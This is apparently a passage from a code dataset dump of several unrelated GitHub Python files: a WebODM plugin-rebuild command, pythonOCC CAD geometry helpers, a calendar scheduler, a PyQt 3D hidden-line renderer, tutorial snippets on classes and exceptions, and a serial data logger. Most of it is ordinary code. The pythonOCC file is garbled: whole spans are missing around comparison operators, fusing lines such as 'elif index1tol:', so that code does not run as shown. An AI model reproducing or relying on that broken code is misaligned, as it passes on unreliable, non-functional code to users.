times","repo_name":"amk1710/DiscretizationBox","sub_path":"DiscretizationBox/travel_times/googlemaps.py","file_name":"googlemaps.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10385510275","text":"import os\nimport shutil\nimport glob\nfrom django.core.management.base import BaseCommand\nfrom app.plugins import build_plugins\n\ndef cleanup():\n    # Delete all node_modules and build directories within plugins' public/ folders\n    root = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"..\", \"..\"))\n    for d in glob.glob(os.path.join(root, \"coreplugins\", \"**\", \"public\", \"node_modules\")):\n        shutil.rmtree(d)\n        print(\"R\\t\" + d)\n    for d in glob.glob(os.path.join(root, \"coreplugins\", \"**\", \"public\", \"build\")):\n        shutil.rmtree(d)\n        print(\"R\\t\" + d)\n\n    print(\"Cleanup done!\")\n\nclass Command(BaseCommand):\n    requires_system_checks = []\n    \n    def add_arguments(self, parser):\n        super(Command, self).add_arguments(parser)\n\n    def handle(self, **options):\n        cleanup()\n        build_plugins()","repo_name":"OpenDroneMap/WebODM","sub_path":"app/management/commands/rebuildplugins.py","file_name":"rebuildplugins.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":2429,"dataset":"github-code","pt":"51"} +{"seq_id":"73983987357","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 9 15:07:47 2018\r\n\r\n@author: 3052180 Liang Sun\r\nuseful website for OCCD:\r\n====================================\r\nfile:///C:/pythonocc-core-0.18/doc/apidoc/0.18/search.html?q=D1&check_keywords=yes&area=default\r\nhttps://www.opencascade.com/doc/occt-6.9.1/refman/html/class_topo_d_s___shape.html\r\nhttps://www.opencascade.com/content/point-parameter\r\n====================================\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\n\r\nfrom OCC.gp import gp_Pnt, gp_Vec\r\nfrom OCC.ShapeAnalysis import ShapeAnalysis_Surface\r\nfrom OCC.BRep import BRep_Tool\r\nfrom OCC.STEPControl import STEPControl_Reader\r\nfrom OCC.IFSelect import IFSelect_RetDone, IFSelect_ItemsByEntity\r\nfrom OCC.GeomLProp import GeomLProp_SLProps \r\nfrom OCC.TopAbs import TopAbs_FORWARD,TopAbs_REVERSED\r\nfrom OCC.BRepTools import breptools\r\nfrom OCC.BRepAdaptor import BRepAdaptor_Curve\r\nfrom OCC.GCPnts import GCPnts_AbscissaPoint, GCPnts_AbscissaPoint_Length\r\nfrom OCC.BRepBuilderAPI import BRepBuilderAPI_MakeVertex\r\nfrom OCC.BRepExtrema import BRepExtrema_DistShapeShape\r\n\r\n\r\nfrom OCC.TDocStd import Handle_TDocStd_Document\r\nfrom OCC.XCAFApp import XCAFApp_Application\r\nfrom OCC.TCollection import TCollection_ExtendedString\r\nfrom OCC.XCAFDoc import (XCAFDoc_DocumentTool_ShapeTool,\r\n                         XCAFDoc_DocumentTool_ColorTool,\r\n                         XCAFDoc_DocumentTool_LayerTool,\r\n                         XCAFDoc_DocumentTool_MaterialTool,\r\n                         XCAFDoc_ColorSurf,XCAFDoc_ColorGen)\r\nfrom OCC.STEPCAFControl import STEPCAFControl_Reader\r\nfrom OCC.TDF import TDF_LabelSequence\r\nfrom OCC.Quantity import Quantity_Color,Quantity_TOC_RGB\r\nfrom OCC.ShapeFix import ShapeFix_Wireframe,ShapeFix_Shape\r\nfrom OCCD_Topo_Traverse import Topo\r\nfrom OCC.BRepGProp import brepgprop\r\nfrom OCC.GProp import GProp_GProps\r\n\r\nimport Python_Basic as PB\r\n\r\n\r\n#############################################################\r\n####                     Topology                       #####\r\n#############################################################\r\n\r\n\r\n\r\ndef ask_face_wires(face, topo):\r\n    \"\"\"\r\n    This returns a list of wires(which is a loop of oriented edge). 
The first one is the boundary of the face.\r\n The followings (if has) are the inner loops.\r\n \"\"\"\r\n wireList=[]\r\n allWires=list(topo.wires_from_face(face))\r\n \r\n if len(allWires)==1:\r\n return allWires\r\n elif len(allWires)>1:\r\n outer=breptools.OuterWire(face)\r\n inners=[x for x in allWires if x!=outer]\r\n wireList.append(outer)\r\n wireList.extend(inners)\r\n return wireList\r\n else:\r\n print(\"Function: face_wires, the number of wires of the face is 0 \") \r\n return None\r\n\r\n\r\n\r\ndef get_edges_bounded_by_vertex_in_face(topo,vertex, face):\r\n \"\"\"\r\n \"\"\"\r\n boundingEdge=[]\r\n es1=list(topo.edges_from_vertex(vertex))\r\n es2=list(topo.edges_from_face(face))\r\n boundingEdge=PB.list_common(es1,es2)\r\n if len(boundingEdge)!=2:\r\n print(\"The vertex is not bounded by two edges\")\r\n return boundingEdge\r\n\r\n\r\ndef get_wire_of_edge_in_face(topo,edge, face):\r\n \"\"\"\r\n \"\"\"\r\n ws1=list(topo.wires_from_edge(edge))\r\n ws2=list(topo.wires_from_face(face))\r\n commonW=PB.list_common(ws1,ws2)\r\n return commonW[0]\r\n\r\n\r\ndef order_two_edges_in_wire(topo,wire,e1,e2):\r\n \"\"\"\r\n \"\"\"\r\n orderedE=list(topo.ordered_edges_from_wire(wire))\r\n \r\n index1=-1\r\n index2=-1\r\n firstE=None\r\n nextE=None\r\n \r\n for i in range(len(orderedE)):\r\n if orderedE[i]==e1:\r\n index1=i\r\n break\r\n for i in range(len(orderedE)):\r\n if orderedE[i]==e2:\r\n index2=i\r\n break\r\n \r\n if index1==0 and index2==len(orderedE)-1:\r\n firstE=e2\r\n nextE=e1\r\n elif index2==0 and index1==len(orderedE)-1:\r\n firstE=e1\r\n nextE=e2\r\n elif index1tol:\r\n uv[0]=uv[0]+geom_surface.UPeriod()\r\n if uv[0]>uvrange[1] and uv[0]-uvrange[1]>tol:\r\n uv[0]=uv[0]-geom_surface.UPeriod()\r\n\r\n \r\n if geom_surface.IsVPeriodic()==True:\r\n if uv[1]tol:\r\n uv[1]=uv[1]+geom_surface.VPeriod()\r\n if uv[1]>uvrange[3] and uv[1]-uvrange[3]>tol:\r\n uv[1]=uv[1]-geom_surface.VPeriod()\r\n# print(uv)\r\n return uv\r\n\r\n\r\n\r\n\r\n\r\ndef ask_point_uv2(xyz, face):\r\n \"\"\"\r\n This is a general function which gives the uv coordiates from the xyz coordinates.\r\n The uv value is not normlized.\r\n \"\"\"\r\n gpPnt=gp_Pnt(float(xyz[0]), float(xyz[1]), float(xyz[2]))\r\n surface=BRep_Tool().Surface(face) ### Handle_Geom_Surface\r\n\r\n sas=ShapeAnalysis_Surface(surface)\r\n gpPnt2D=sas.ValueOfUV(gpPnt,0.01)\r\n uv=list(gpPnt2D.Coord())\r\n\r\n return uv\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef ask_point_normal_face(uv,face):\r\n \"\"\"\r\n Ask the normal vector of a point given the uv coordinate of the point on a face\r\n \"\"\"\r\n surface=BRep_Tool().Surface(face)\r\n props=GeomLProp_SLProps(surface,uv[0],uv[1],1,1e-6)\r\n# GeomLProp_SLProps.SetParameters(surface,uv[0],uv[1])\r\n# GeomLProp_SLProps.SetSurface(surface)\r\n\r\n gpDir=props.Normal()#gp_Dir type\r\n if face.Orientation()==TopAbs_REVERSED:\r\n gpDir.Reverse()\r\n #print(\"face reversed\")\r\n return gpDir.Coord()\r\n\r\n\r\n\r\ndef corner_angle(topo, vertex, face):\r\n \"\"\"\r\n \"\"\"\r\n angle=0\r\n edges=get_edges_bounded_by_vertex_in_face(topo,vertex, face)\r\n if edges==[]: ### it is possible that a vertex of a superface is only a vertex of\r\n ### one of the hosts. 
In this case, for the other host faces, the angle should be 0\r\n return angle\r\n wire=get_wire_of_edge_in_face(topo,edges[0], face)\r\n [firstE,nextE]=order_two_edges_in_wire(topo,wire,edges[0],edges[1])\r\n \r\n result1=edge_extreme(firstE)\r\n result2=edge_extreme(nextE)\r\n \r\n parm1=ask_vertice_parm_edge(vertex,firstE)\r\n parm2=ask_vertice_parm_edge(vertex,nextE)\r\n# t1=ask_edge_tangent2(firstE,parm1)\r\n# t2=ask_edge_tangent2(nextE,parm2)\r\n# print(result1[1:])\r\n# print(result2[1:])\r\n# print(parm1)\r\n# print(parm2)\r\n# print(t1)\r\n# print(t2)\r\n\r\n if abs(parm1-result1[1])= hour)and(m > minut)) or (week > current_week) or ((week == current_week) and (d > day)) or ((week == current_week) and (d == day) and (h > hour))):\n if pages == 0 : break\n if self.table[d,current_pos] == 0:\n if pages > 60:\n pages = pages-60\n self.table[d,current_pos] = doc_nb\n else:\n pages = 0\n self.table[d,current_pos] = doc_nb\n return pages\n\nclass Calendar(object):\n def __init__(self,data_path):\n self.data_path = data_path\n \n def add_document(self,title,pages):\n \n doc = Document(title,pages)\n date = datetime.datetime.now()\n isocalendar = datetime.date(date.year, date.month, date.day).isocalendar()\n week_nb = isocalendar[1]\n day_nb = isocalendar[2] -1\n hour_nb = date.hour\n minut_nb = date.minute\n while doc.pages != 0:\n week_path = \"week_\"+str(week_nb)+\".pkl\"\n if os.path.exists(self.data_path+'/'+week_path):\n with open(self.data_path+'/'+week_path,'rb') as data:\n week = pickle.load(data) \n else :\n week = Week(week_nb)\n \n pages = week.addDocument(doc,minut_nb,hour_nb,day_nb,week_nb)\n self.save_week(week) \n doc = Document(title,pages)\n week_nb +=1\n print(pages)\n return pages\n \n def save_week(self,week):\n file = \"week_\"+str(week.week_nb)+\".pkl\"\n with open(self.data_path+'/'+file,'wb') as file:\n pickle.dump(week,file,pickle.HIGHEST_PROTOCOL)\n\n def get_week(self,week):\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n if (int(file[5:7]) == week):\n print(week)\n with open(self.data_path+'/'+file,'rb') as data:\n week = pickle.load(data)\n return week.table\n return 0\n \n def get_docs(self,week):\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n if (int(file[5:7]) == week):\n print(week)\n with open(self.data_path+'/'+file,'rb') as data:\n week = pickle.load(data)\n return week.docs\n return 0\n \n def list_weeks(self):\n list = []\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n list.append(file[5:7])\n return list\n\n def reset(self):\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n os.remove(self.data_path+\"/\"+file)\n\n","repo_name":"chefmtt/chatbot-sdia","sub_path":"agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42991008216","text":"# 物件導向 - 練習\nclass Person :\n # 定義專屬技能 init\n # 節省設定資料的程式碼\n def __init__(self, n, h, w):\n self.name = n\n self.height = h\n self.weight = w\n\n def bmi(self,**kwargs):\n bmi = self.weight / (self.height / 100) ** 2\n if \"rounded\" in kwargs :\n return round(bmi,kwargs[\"rounded\"])\n else :\n return bmi\n\np1 = Person(\"Elwing\",175,85)\nprint(p1.name,p1.bmi(rounded=3))\np2 = 
Person(\"Fiamma\",172,60)\nprint(p2.name,p2.bmi(rounded=3))\n\n","repo_name":"fiamma66/python-basic","sub_path":"workplace-practice/main6.py","file_name":"main6.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13158007153","text":"import math\nimport numpy as np\nfrom itertools import combinations, chain, permutations\nfrom functools import reduce\nfrom scipy.optimize import linprog\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QWidget, QApplication\nfrom PyQt5.QtGui import QPainter, QPen, QPolygon, QBrush, QFont, QMouseEvent\nfrom PyQt5.QtCore import Qt, QPoint, QRect, QLine, QTimer\nimport sys\n\nnp.set_printoptions(precision=2)\nEPSILON = 0.000001\n\nclass FifthTask(QWidget):\n def __init__(self):\n super().__init__()\n self.setGeometry(100, 100, 800, 800)\n\n self.x1 = -4\n self.x2 = 4\n self.y1 = -4\n self.y2 = 4\n\n square = [([1.2, 1.2, 1.2], [0, 2, 5]),\n ([-1.2, 1.2, 1.2], [0, 1, 2]),\n ([1.2, -1.2, 1.2], [2, 3, 5]),\n ([1.2, 1.2, -1.2], [0, 4, 5]),\n ([-1.2, -1.2, 1.2], [1, 2, 3]),\n ([-1.2, 1.2, -1.2], [0, 1, 4]),\n ([1.2, -1.2, -1.2], [3, 4, 5]),\n ([-1.2, -1.2, -1.2], [1, 3, 4])]\n\n tetra = [([3, 0, 0], [0, 1, 2]),\n ([0, 0.5, 0.5], [0, 1, 3]),\n ([0, -0.5, 0.5], [0, 2, 3]),\n ([0, 0.5, -0.5], [1, 2, 3])]\n\n square2 = [([1, 1.5, 1], [0, 2, 5]),\n ([-1, 1.5, 1], [0, 1, 2]),\n ([1, -1.5, 1], [2, 3, 5]),\n ([1, 1.5, -1], [0, 4, 5]),\n ([-1, -1.5, 1], [1, 2, 3]),\n ([-1, 1.5, -1], [0, 1, 4]),\n ([1, -1.5, -1], [3, 4, 5]),\n ([-1, -1.5, -1], [1, 3, 4])]\n\n square3 = [([2, 1, 1.5], [0, 2, 5]),\n ([0, 1, 1.5], [0, 1, 2]),\n ([2, -1, 1.5], [2, 3, 5]),\n ([2, 1, -1.5], [0, 4, 5]),\n ([0, -1, 1.5], [1, 2, 3]),\n ([0, 1, -1.5], [0, 1, 4]),\n ([2, -1, -1.5], [3, 4, 5]),\n ([0, -1, -1.5], [1, 3, 4])]\n\n self.point_shapes = [square2, square3, square, tetra]\n\n self.rotation_angle_x = 0\n self.rotation_angle_y = 0\n self.rotation_angle_z = 0\n self.redraw()\n\n self.init_ui()\n\n def make_normal_vectior_point_outside(self, centroid, plane):\n if np.array(plane).dot(np.append(centroid, 1)) < EPSILON:\n return (plane * -1)\n return plane\n\n def redraw(self):\n self.intersections_with_view_planes = []\n self.transformed_point_shapes = []\n self.lines_to_draw = []\n self.black_points = []\n self.visible_edges = [[] for _ in range(len(self.point_shapes))]\n self.transformed_plane_shapes = [[] for _ in range(len(self.point_shapes))]\n self.visible_plane_shapes = [[] for _ in range(len(self.point_shapes))]\n self.intersections_with_sides_shapes = [[] for _ in range(len(self.point_shapes))]\n\n for p_shape in self.point_shapes:\n t = list(map(self.transform, p_shape))\n self.transformed_point_shapes.append(list(map(lambda p: (p[0][:3], p[1]), t)))\n\n\n for index, p_shape in enumerate(self.transformed_point_shapes):\n plane_ids = set().union(*list(map(lambda p: p[1], p_shape)))\n centroid = np.array(reduce(lambda a, x: a + x[0], np.array(p_shape), np.zeros(3))) / len(p_shape)\n for id in plane_ids:\n plane_points = list(filter(lambda p: id in p[1], p_shape))\n plane = np.array(self.get_plane_from_3_points(*[p[0] for p in plane_points]))\n plane = self.make_normal_vectior_point_outside(centroid, plane)\n if np.dot(plane, [0, 0, -1, 0]) > EPSILON:\n self.visible_plane_shapes[index].append(plane)\n for p1, p2 in combinations(plane_points, 2):\n if len(set(p1[1]).intersection(p2[1]).difference(list([id]))):\n self.visible_edges[index].append([[p1[0][:3], p2[0][:3]], []])\n 
self.transformed_plane_shapes[index].append(plane)\n self.transformed_plane_shapes[index] = np.array(self.transformed_plane_shapes[index]).transpose()\n\n # p = 0\n for i in range(len(self.point_shapes)):\n for j in range(len(self.point_shapes)):\n if i == j: continue\n planes = np.array(self.transformed_plane_shapes[i]).transpose()\n for line in self.visible_edges[j][:]:\n for plane in planes:\n p1, p2 = line[0]\n intersection, t = self.linePlaneIntersection(p1, p2, plane, [0 + EPSILON*2, 1 - EPSILON*2])\n if intersection is not None:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())), np.append(intersection, 1))\n if not any(map(lambda p: p < -EPSILON, dot)):\n self.intersections_with_sides_shapes[j].append(intersection)\n line[1].append(t)\n\n # 0 < t < 1\n for i in range(len(self.point_shapes)):\n for j in range(len(self.point_shapes)):\n if i == j: continue\n for line1 in self.visible_edges[i]:\n for line2 in self.visible_edges[j][:]:\n t, intersection = self.view_plane_line_intercection(line1[0], line2[0])\n if t:\n # self.intersections_with_view_planes.append(intersection)\n line1[1].append(t)\n\n # # # adding intersection edges\n self.visible_edges.append(list(map(lambda line: (line, []),\n list(filter(lambda line: self.is_line_visible(line),\n permutations(chain(*self.intersections_with_sides_shapes), 2))))))\n\n # t = 0, 1\n for i in range(len(self.point_shapes)):\n for j in range(len(self.point_shapes)+1):\n if i == j: continue\n planes = np.array(self.transformed_plane_shapes[i]).transpose()\n for plane in planes:\n for line in self.visible_edges[j][:]:\n p1, p2 = line[0]\n\n intersection, t = self.linePlaneIntersection(p1, p1 + np.array([0, 0, 1]), plane, [0, float('inf')])\n if intersection is not None and abs(t) > EPSILON:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())), np.append(intersection, 1))\n if not any(map(lambda p: p < EPSILON, dot)):\n self.intersections_with_view_planes.append(intersection)\n line[1].append(0)\n\n intersection, t = self.linePlaneIntersection(p2, p2 + np.array([0, 0, 1]), plane, [0, float('inf')])\n if intersection is not None and abs(t) > EPSILON:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())),\n np.append(intersection, 1))\n if not any(map(lambda p: p < EPSILON, dot)):\n self.intersections_with_view_planes.append(intersection)\n line[1].append(1)\n\n\n\n\n self.lines_to_draw = list(chain(*map(lambda edge: self.get_line_minmax(edge), chain(*self.visible_edges))))\n\n self.update()\n\n def linePlaneIntersection(self, p1, p2, plane, interval):\n # https://stackoverflow.com/a/7170101/7868408\n plane = np.array(plane)\n normal = plane[:3]\n if plane[2]:\n coord = np.array([0,0, -plane[3]/plane[2]])\n elif plane[1]:\n coord = np.array([0, -plane[3] / plane[1], 0])\n else:\n coord = np.array([-plane[3] / plane[0], 0, 0])\n ray = np.array(p2) - np.array(p1)\n d = np.dot(normal, coord)\n if abs(np.dot(normal, ray)) < EPSILON:\n return None, None\n x = (d - np.dot(normal, p1))/np.dot(normal, ray)\n\n intersection = p1 + ray*x\n if interval[0] - EPSILON <= x <= interval[1] + EPSILON:\n return intersection, x\n return None, None\n\n def normalize(self, v):\n norm = np.linalg.norm(v)\n if norm == 0:\n return v\n return v / norm\n\n def get_plane_from_3_points(self, point1, point2, point3, *ignored):\n x1, y1, z1 = point1\n x3, y3, z3 = point3\n x2, y2, z2 = point2\n vector1 = [x2 - x1, y2 - y1, z2 - z1]\n vector2 = [x3 - x1, y3 - y1, z3 - z1]\n\n 
cross_product = [vector1[1] * vector2[2] - vector1[2] * vector2[1],\n -1 * (vector1[0] * vector2[2] - vector1[2] * vector2[0]),\n vector1[0] * vector2[1] - vector1[1] * vector2[0]]\n\n a = cross_product[0]\n b = cross_product[1]\n c = cross_product[2]\n d = - (cross_product[0] * x1 + cross_product[1] * y1 + cross_product[2] * z1)\n\n\n return (a, b, c, d)\n\n def get_line_minmax(self, line):\n v = np.array(line[0][1]) - np.array(line[0][0])\n if len(set(line[1])) > 1:\n p1 = line[0][0] + min(line[1]) * v\n p2 = line[0][0] + max(line[1]) * v\n result = [[line[0][0], p1], [p2, line[0][1]]]\n return list(filter(lambda p: not np.array_equal(p[0], p[1]), result))\n elif len(set(line[1])) == 1:\n return []\n return [line[0]]\n\n def is_line_visible(self, line):\n middle = np.array(self.get_middle_point(line))\n for shape in self.transformed_plane_shapes:\n planes = np.array(shape).transpose()\n dot = np.dot(planes, np.append(middle, 1))\n if all(map(lambda p: p > EPSILON, dot)):\n return False\n for plane in chain(*self.visible_plane_shapes):\n intersection, t = self.linePlaneIntersection(middle, middle + np.array([0, 0, 1]), plane, [2*EPSILON+0, float('inf')])\n if intersection is not None:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())),\n np.append(intersection, 1))\n if not any(map(lambda p: p < EPSILON, dot)):\n return False\n return True\n\n\n def get_middle_point(self, line):\n A = np.array(line[0])\n B = np.array(line[1])\n return ((B - A) / 2) + A\n\n def view_plane_line_intercection(self, view_line, line):\n A = np.array(view_line[0])\n B = np.array(view_line[1])\n D = np.array([0, 0, 1])\n C = np.array(line[1]) - np.array(line[0])\n matrix = np.array([B - A, D, -C]).transpose()\n\n right_handside = np.array(np.array(line[0]) - A)\n try:\n t, p, s = np.linalg.solve(matrix, right_handside)\n if (0 <= t <= 1 and p >= 0 and 0 <= s <= 1):\n new = (np.array(line[0]) + C * s)\n return t, new\n except:\n return None, None\n return None, None\n\n def distance(self, point1, point2):\n p = np.array(point1) - np.array(point2)\n return math.sqrt(np.dot(p, p))\n\n def init_ui(self):\n self.setWindowTitle('Fifth Task')\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.white)\n self.setPalette(p)\n self.show()\n\n def paintEvent(self, e):\n qp = QPainter()\n qp.begin(self)\n font = QFont()\n font.setPixelSize(10)\n qp.setFont(font)\n self.draw_shape(qp)\n qp.end()\n\n def draw_shape(self, qp: QPainter):\n qp.setPen(QPen(Qt.blue, 1, Qt.SolidLine))\n # helpers\n qp.drawText(QPoint(0, 10),\n 'rotaion: ' + str(np.array([self.rotation_angle_x, self.rotation_angle_y, self.rotation_angle_z])))\n for line in self.lines_to_draw:\n qp.drawLine(self.plane_to_screen(line[0]), self.plane_to_screen(line[1]))\n # helpers\n # qp.drawText(self.plane_to_screen(line[0]), str(np.array(line[0])))\n # qp.drawText(self.plane_to_screen(line[1]), str(np.array(line[1])))\n\n # helpers\n # qp.setPen(QPen(Qt.red, 3, Qt.SolidLine))\n # for point in self.intersections_with_view_planes:\n # qp.drawPoint(self.plane_to_screen(point))\n # qp.drawText(self.plane_to_screen(point), str(np.array(point)))\n\n # qp.setPen(QPen(Qt.green, 3, Qt.SolidLine))\n # for point in chain(*self.intersections_with_sides_shapes):\n # qp.drawPoint(self.plane_to_screen(point))\n # qp.drawText(self.plane_to_screen(point), str(np.array(point)))\n\n # qp.setPen(QPen(Qt.black, 3, Qt.SolidLine))\n # for point in self.black_points:\n # qp.drawPoint(self.plane_to_screen(point))\n # 
qp.drawText(self.plane_to_screen(point), str(np.array(point)))\n\n    def plane_to_screen(self, v):\n        xp, yp = self.front_projection(v)\n        xx = round((xp - self.x1) * self.geometry().width() / (self.x2 - self.x1))\n        yy = self.geometry().height() - round((yp - self.y1) * self.geometry().height() / (self.y2 - self.y1))\n        return QPoint(xx, yy)\n\n    def front_projection(self, v):\n        return v[0], v[1]\n\n    def transform(self, point):\n        m = point[0]\n        if len(m) == 3:\n            m = np.append(m, [0])\n        return self.rotation_z(self.rotation_y(self.rotation_x(m))), point[1]\n\n    def rotation_x(self, m):\n        angle = self.rotation_angle_x\n        rot_matrix = np.array([\n            [1, 0, 0, 0],\n            [0, math.cos(angle), math.sin(angle), 0],\n            [0, -math.sin(angle), math.cos(angle), 0],\n            [0, 0, 0, 1],\n        ])\n        return np.dot(np.linalg.inv(rot_matrix), m)\n\n    def rotation_y(self, m):\n        angle = self.rotation_angle_y\n        rot_matrix = np.array([\n            [math.cos(angle), 0, -math.sin(angle), 0],\n            [0, 1, 0, 0],\n            [math.sin(angle), 0, math.cos(angle), 0],\n            [0, 0, 0, 1],\n        ])\n\n        return np.dot(np.linalg.inv(rot_matrix), m)\n\n    def rotation_z(self, m):\n        angle = self.rotation_angle_z\n        rot_matrix = np.array([\n            [math.cos(angle), math.sin(angle), 0, 0],\n            [-math.sin(angle), math.cos(angle), 0, 0],\n            [0, 0, 1, 0],\n            [0, 0, 0, 1],\n        ])\n\n        return np.dot(np.linalg.inv(rot_matrix), m)\n\n    def keyPressEvent(self, event):\n        if event.key() == QtCore.Qt.Key_S:\n            self.rotation_angle_x += 0.1\n        elif event.key() == QtCore.Qt.Key_W:\n            self.rotation_angle_x -= 0.1\n\n        elif event.key() == QtCore.Qt.Key_D:\n            self.rotation_angle_y += 0.1\n        elif event.key() == QtCore.Qt.Key_A:\n            self.rotation_angle_y -= 0.1\n\n        elif event.key() == QtCore.Qt.Key_Q:\n            self.rotation_angle_z += 0.1\n        elif event.key() == QtCore.Qt.Key_E:\n            self.rotation_angle_z -= 0.1\n        else:\n            return\n        self.redraw()\n\n\ndef my_exception_hook(exctype, value, traceback):\n    print(exctype, value, traceback)\n    sys._excepthook(exctype, value, traceback)\n    sys.exit(1)\n\n\nif __name__ == '__main__':\n    sys._excepthook = sys.excepthook\n    sys.excepthook = my_exception_hook\n    app = QApplication(sys.argv)\n    ex = FifthTask()\n    sys.exit(app.exec_())\n","repo_name":"evilPaprika/computer-graphics-and-geometry","sub_path":"fifth_task.py","file_name":"fifth_task.py","file_ext":"py","file_size_in_byte":15452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1519641447","text":" \nimport logging # Python内置的日志\n\ntry:\n\tprint('try...')\n\ta = 10 / int('1')\n\tprint('result: %d' % a)\nexcept ValueError as e:\n\tprint('ValueError except:', e)\nexcept ZeroDivisionError as e:\n\tprint('ZeroDivisionError except:', e)\nelse:\n\tprint('no error')\nfinally:\n\tprint('finally....')\n\nprint('END')\n\n# Python的错误其实也是class,所有的错误类型都继承自BaseException,所以在使用except时需要注意的是,它不但捕获该类型的错误,还把其子类也“一网打尽”。比如:\n\n# try:\n#     foo()\n# except ValueError as e:\n#     print('ValueError')\n# except UnicodeError as e:\n#     print('UnicodeError')\n\n# 第二个except永远也捕获不到UnicodeError,因为UnicodeError是ValueError的子类,如果有,也被第一个except给捕获了。\n\nprint('------------------------------')\n# 使用try...except捕获错误还有一个巨大的好处,就是可以跨越多层调用,\n# 比如函数main()调用foo(),foo()调用bar(),结果bar()出错了,这时,只要main()捕获到了,就可以处理\n# 也就是说,不需要在每个可能出错的地方去捕获错误,只要在合适的层次去捕获错误就可以了。这样一来,就大大减少了写try...except...finally的麻烦。\n\ndef foo(s):\n\treturn 10 / int(s)\n\ndef bar(s):\n\treturn foo(s) * 2\n\ndef main():\n\ttry:\n\t\tbar('0')\n\texcept Exception as e:\n\t\tlogging.exception(e)\n\tfinally:\n\t\tprint('finally...')\n\nmain()\n\n# 自定义Exception,然后抛出异常\nclass FooError(ValueError):\n\tpass\n\n# def foo(s):\n# \tn = int(s)\n# \tif n == 0:\n# \t\traise FooError('invalid value: %s' % s)\n# \treturn 10 / n\n\n# foo('0')\n\n# err_reraise.py\n\ndef foo(s):\n    n = int(s)\n    if n==0:\n        raise ValueError('invalid value: %s' % s)\n    return 10 / n\n\ndef bar():\n    try:\n        foo('0')\n    except ValueError as e:\n        print('ValueError!') # 只是为了记录一下\n        raise # 统一往上报,在最上层处理\n\n# bar()\n\n#其实这种错误处理方式不但没病,而且相当常见。捕获错误目的只是记录一下,便于后续追踪。但是,由于当前函数不知道应该怎么处理该错误,所以,最恰当的方式是继续往上抛,让顶层调用者去处理\n\n# raise语句如果不带参数,就会把当前错误原样抛出。此外,在except中raise一个Error,还可以把一种类型的错误转化成另一种类型:\n\ntry:\n    10 / 0\nexcept ZeroDivisionError:\n    raise ValueError('input error!')\n","repo_name":"ianzhengnan/learnpy","sub_path":"renew/errorhandling/errorhandling.py","file_name":"errorhandling.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"37509683988","text":"#!/usr/bin/python3\n\n# tested with Python 3.6.5 (default, Apr  1 2018, 05:46:30) \nimport serial, datetime, time\nimport termios # strange USB serial vodoo\n\npath = \"/home/pi/FMES/\" # path to log file\n\n# device='/dev/ttyACM0' # Teensy 3.2\ndevice='/dev/ttyUSB0' # USB-serial device\n#baudrate=57600 # serial device baud rate\nbaudrate=115200 # serial device baud rate\n\nFLIM = 100 # flush buffer after writing this many lines\n\n# time.sleep(45) # when run at bootup, delay to make sure network time has been set\n\nt = datetime.datetime.utcnow()\nts = t.strftime(\"%y%m%d_%H%M%S\") # for example: 190516_183009\nfname = path + ts + \"_FMES.csv\" # data log filename with start date/time\nf = open(fname, 'w') # open log file\n\nfctr = FLIM - 5 # saved-line counter (flush buffer after FLIM lines, except at start)\npctr = 5 # sample decimation counter \nfirstline = 1 # have not yet finished the first line\n\nf.write(\"ADC1, Range1, ADC2, Range2\\n\") # write CSV file column header\noline = \"# Start: \" + str(datetime.datetime.utcnow()) + \" UTC \\n\"\nf.write(oline)\nf.write(\"# ADS1115 Diff 01+23 channels 2019-04-07 JPB\\n\")\n\noldm = int(time.time()/60.0) # time.time() = floating-point seconds since epoch\n\nwith serial.Serial(device, baudrate, timeout=1) as ser:\n    oline = \"# \" + str(ser) + \"\\n\" # DEBUG: show state of serial port\n    f.write(oline) # debug\n    f.flush()\n    for i in range(2):\n        line = ser.readline()\n        print(line) # DEBUG: show raw input line of text\n\n    while True:\n        line = ser.readline()\n        # print(line) # DEBUG: show raw input line of text\n        s0 = line.decode(\"utf-8\").strip() # bytes to string, without start/end whitespace\n        s = s0.strip('\\0') # serial port open sometimes gives a null byte\n        nc = len(s) # how many useful characters in the input string?\n        s = s\n        if ( nc > 0 ):\n            m = int(time.time()/60.0) # time.time() = floating-point seconds since epoch\n            f.write(s)\n            if (m != oldm): # minute marker at top of each minute\n                oline = \", \" + str(datetime.datetime.utcnow())\n                f.write(oline)\n                oldm=m\n\n            f.write(\"\\n\")\n            fctr += 1\n            if (fctr > FLIM):\n                f.flush()\n                fctr = 0\n        # print(s,end='')\n","repo_name":"jbeale1/DataAcq","sub_path":"FMES-log.py","file_name":"FMES-log.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"33682497370","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom .views import ContactFormView\n\nurlpatterns = patterns(\n    